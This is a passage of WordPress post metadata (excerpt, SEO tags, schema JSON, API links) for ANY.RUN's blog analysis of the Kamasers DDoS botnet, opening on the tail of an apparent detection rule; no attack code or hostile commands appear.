(8&nbsp;of&nbsp;($msg*))&nbsp;<\/p>\n\n\n\n<p>}&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>DDoS attacks are no longer only an infrastructure problem. They can quickly turn into a business issue, affecting uptime, customer experience, and operational stability. Kamasers is a strong example of this new reality, with broad attack capabilities and resilient command-and-control mechanisms that allow it to remain active under pressure. Let\u2019s explore the Kamasers botnet through [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":19488,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,10,34],"class_list":["post-19450","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-malware-analysis"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Kamasers Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide<\/title>\n<meta name=\"description\" content=\"See how the Kamasers botnet can disrupt business operations through multi-vector DDoS attacks, resilient infrastructure, and broad attack capabilities.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Achmad Adhikara, 4OURUP and GridGuardGhoul\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\"},\"author\":{\"name\":\"Achmad Adhikara, 4OURUP and GridGuardGhoul\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0\",\"datePublished\":\"2026-03-25T10:20:25+00:00\",\"dateModified\":\"2026-03-27T09:07:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\"},\"wordCount\":4208,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"malware analysis\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\",\"name\":\"Kamasers Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-03-25T10:20:25+00:00\",\"dateModified\":\"2026-03-27T09:07:17+00:00\",\"description\":\"See how the Kamasers botnet can disrupt business operations through multi-vector DDoS attacks, resilient infrastructure, and broad attack capabilities.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},[{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"Achmad Adhikara\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1-150x150.jpg\",\"caption\":\"Achmad Adhikara\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"4OURUP\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/4up-150x150.jpg\",\"caption\":\"4OURUP\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"GridGuardGhoul\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/image_GridGuardGhoul-150x150.jpeg\",\"caption\":\"GridGuardGhoul\"}}]]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Kamasers Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide","description":"See how the Kamasers botnet can disrupt business operations through multi-vector DDoS attacks, resilient infrastructure, and broad attack capabilities.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/","twitter_misc":{"Written by":"Achmad Adhikara, 4OURUP and GridGuardGhoul","Est. reading time":"19 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/"},"author":{"name":"Achmad Adhikara, 4OURUP and GridGuardGhoul","@id":"https:\/\/any.run\/"},"headline":"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0","datePublished":"2026-03-25T10:20:25+00:00","dateModified":"2026-03-27T09:07:17+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/"},"wordCount":4208,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","cybersecurity","malware analysis"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/","url":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/","name":"Kamasers Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2026-03-25T10:20:25+00:00","dateModified":"2026-03-27T09:07:17+00:00","description":"See how the Kamasers botnet can disrupt business operations through multi-vector DDoS attacks, resilient infrastructure, and broad attack capabilities.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},[{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"Achmad Adhikara","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1-150x150.jpg","caption":"Achmad Adhikara"}},{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"4OURUP","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/4up-150x150.jpg","caption":"4OURUP"}},{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"GridGuardGhoul","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/image_GridGuardGhoul-150x150.jpeg","caption":"GridGuardGhoul"}}]]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19450"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=19450"}],"version-history":[{"count":37,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19450\/revisions"}],"predecessor-version":[{"id":19533,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19450\/revisions\/19533"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/19488"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=19450"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=19450"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=19450"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}